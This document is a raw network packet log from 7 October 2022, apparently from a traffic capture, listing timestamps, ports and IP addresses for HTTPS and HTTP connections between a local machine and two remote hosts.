Oct 7, 2022 15:59:28.722079039 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.722101927 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.722289085 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.722342968 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.722359896 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.722376108 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.722394943 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.722428083 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.722444057 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.722606897 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.722626925 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.723206997 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.723256111 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.723262072 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.723278999 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.723304033 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.723356009 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.723371983 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.723567009 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.724128962 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.724184990 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.724196911 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.724224091 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.724246979 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.724292994 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.724293947 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.724312067 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.724355936 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.724740982 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.724808931 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.725091934 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.725173950 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.725193024 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.725214958 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.725245953 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.725261927 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.725296021 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.725364923 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.725369930 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.725389004 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.725419998 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.726279974 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.726399899 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.726485968 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.726506948 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.726536036 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.726597071 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.726636887 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.726697922 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.726790905 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.726855993 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.726938963 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.726994991 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.727042913 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.727098942 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.727144003 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.727202892 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.727245092 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.727298975 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.727346897 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.727408886 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.727686882 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.727786064 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.727833986 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.727904081 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.727947950 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.727999926 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:28.934938908 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:28.982733011 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:29.190902948 CEST	443	49714	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:29.190987110 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:29.442662954 CEST	49714	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:46.395361900 CEST	49711	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:46.396687984 CEST	49715	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:46.423191071 CEST	80	49715	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:46.423286915 CEST	49715	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:46.423841000 CEST	49715	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:46.424997091 CEST	80	49711	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:46.425054073 CEST	49711	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:46.450278044 CEST	80	49715	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:46.451282024 CEST	80	49715	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:46.499831915 CEST	49715	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:47.702349901 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.702402115 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.702672958 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.703567982 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.703592062 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.754760027 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.754890919 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.762970924 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.763000011 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.763566017 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.765048027 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.765073061 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.913820028 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.913929939 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.914022923 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.914051056 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.914083958 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.914172888 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.914241076 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.914261103 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.914311886 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.914371014 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.914388895 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.914458036 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.915148973 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.915236950 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.916997910 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.917078018 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.918131113 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.918155909 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.918222904 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.932606936 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.932706118 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.932748079 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.932773113 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.932816029 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.933235884 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.933314085 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.934865952 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.934978962 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.935014009 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.935029030 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.935091019 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.936202049 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.936295033 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.936337948 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.936391115 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.937443018 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.937530994 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.938529015 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.938586950 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.938618898 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.938628912 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.938931942 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.939655066 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.939728022 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.939838886 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.939898014 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.940632105 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.940721035 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.941437960 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.941484928 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.941512108 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.941554070 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.942287922 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.942354918 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.942375898 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.942421913 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.951616049 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.951688051 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.951914072 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.951968908 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.952025890 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.952075005 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.952682972 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.952734947 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.953416109 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.953483105 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.953805923 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.953866959 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.953886032 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.953924894 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.954170942 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.954588890 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.954659939 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.954662085 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.954690933 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.955128908 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.955384016 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.955446959 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.956262112 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.956341982 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.956351042 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.956374884 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.956419945 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.956661940 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.956712008 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.956722021 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.956731081 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.957323074 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.957360983 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.957391024 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.957402945 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.957417965 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.958292961 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.958334923 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.958364964 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.958365917 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.958380938 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.958400965 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.959202051 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.959239006 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.959300041 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.959316969 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.959378958 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.960027933 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.960089922 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.960100889 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.960108995 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.960123062 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.960160971 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.961129904 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.961184025 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.961210966 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.961220026 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.961230993 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.961251974 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.961937904 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.961978912 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.962012053 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.962023973 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.962753057 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.970542908 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.970601082 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.970608950 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.970624924 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.970665932 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.970688105 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.970699072 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.970779896 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.970788002 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.970798016 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.970829010 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.970845938 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.970854044 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.971152067 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.971563101 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.971616030 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.971625090 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.971641064 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.971662998 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.971699953 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.971714973 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.971726894 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.971746922 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.972460985 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.972524881 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.972537994 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.972579002 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.972620964 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.972629070 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.972637892 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.972671986 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.975264072 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975326061 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975402117 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975428104 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.975440979 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975492954 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975509882 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.975518942 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975549936 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.975574970 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975620031 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975667000 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.975668907 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975683928 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975725889 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975733042 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.975742102 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975774050 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975789070 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.975797892 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975826979 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.975857019 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975893974 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975927114 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.975935936 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.975950003 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.976007938 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.976018906 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.976068974 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.976207972 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.976269007 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.976277113 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.976321936 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.976326942 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.976340055 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.976377010 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.976397991 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.976406097 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.976521969 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.977186918 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.977256060 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.977273941 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.977288008 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.977297068 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.977313042 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.977336884 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.977363110 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:47.977369070 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.977993965 CEST	443	49716	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:47.978076935 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:48.055596113 CEST	49716	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:48.552704096 CEST	49709	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:48.553971052 CEST	49717	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:48.579272985 CEST	80	49709	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:48.579371929 CEST	49709	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:48.580128908 CEST	80	49717	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:48.580574989 CEST	49717	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:48.582084894 CEST	49717	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:48.608298063 CEST	80	49717	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:48.609190941 CEST	80	49717	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:48.656256914 CEST	49717	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:49.630268097 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.630320072 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.630409956 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.631782055 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.631799936 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.678652048 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.678797007 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.682704926 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.682729006 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.683151007 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.685388088 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.685411930 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.834552050 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.834681034 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.834768057 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.834769964 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.834794998 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.834901094 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.834953070 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.834973097 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.834996939 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.835014105 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.835022926 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.835068941 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.835937977 CEST	443	49718	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:49.836015940 CEST	49718	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:49.837826967 CEST	443	49718	185.60.216.35	192.168.2.5
